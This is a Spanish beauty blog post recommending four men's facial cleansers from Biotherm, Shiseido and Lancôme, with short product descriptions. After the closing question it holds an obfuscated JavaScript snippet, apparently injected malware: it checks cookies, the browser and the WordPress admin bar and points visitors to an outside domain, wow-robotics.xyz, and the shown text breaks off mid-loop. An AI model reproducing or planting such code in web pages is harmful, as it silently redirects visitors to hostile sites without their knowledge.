limpiador facial hombre

Hoy venimos con un post completito para aquellos que al levantarse por la mañana busquen algo más que echarse un poco de agua y salir a la calle.

Igual de importante es aplicarse una crema hidratante que limpiar con productos de calidad la piel de nuestro rostro.

Os dejamos una guía de 4 limpiadores faciales para hombre que creemos que no deberías de perderte.

Si lo que necesitas es una ayudita por las mañanas para acabar de despertarte, prueba con el limpiador de la gama Total Recharge de Biotherm Homme. Se trata de un limpiador en formato gel que deja la piel limpia y revitalizada. Ideal para las mañanas más difíciles, lleva a cabo un revitalizante efecto ‘wake-up’, dejando la piel más fresca y con más energía.

limpiador total recharge hombre biotherm

 

 

 

 

 

 

 

 

 

 

 

 

Shiseido Men nos presenta su reconocida limpiadora Cleansing Foam en textura mouse.

limpiadora shiseido men

 

 

 

 

 

 

 

 

 

 

 

 

 

Su espuma limpiadora de uso diario de alta eficacia que elimina la suciedad y el exceso de grasa respetando la hidratación natural de la piel. Su rica espuma hace que sea perfecta para ser utilizada como espuma de afeitado. Deja la piel excepcionalmente fresca sin sensación de sequedad o tirantez. No comedogénico.

Para las pieles más delicadas Biotherm Homme nos presenta Aquapower D-Sensitive un gel limpiador sin jabón, sin parabenes y sin fragancia.

limpiador aquapower sensitive

 

 

 

 

 

 

 

 

 

 

 

 

Sus propiedades calmantes limpian en profundidad con siendo muy respetuosas con nuestra piel. Elimina las impurezas de forma efectiva y sin agredir la piel. La piel se muestra suave, limpia y calmada lo que la convierte en la limpiadora ideal para pieles sensibles.

Para acabar un limpiador que pone la innovación al servicio de la limpieza, la casa Lâncome Men nos presenta el gel Nettoyant Ultime. Se trata de un gel limpiador que podemos utilizar diariamente por las mañanas ya que no reseca la piel. Además se aclara con facilidad aportando comodidad para su uso diario. Nuestra piel lucirá radiante y flexible.

 

gel limpiado lancome hombre

 

 

 

 

 

 

 

 

 

 

 

¿Cuéntanos eres de los que utiliza un limpiador facial?

 

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone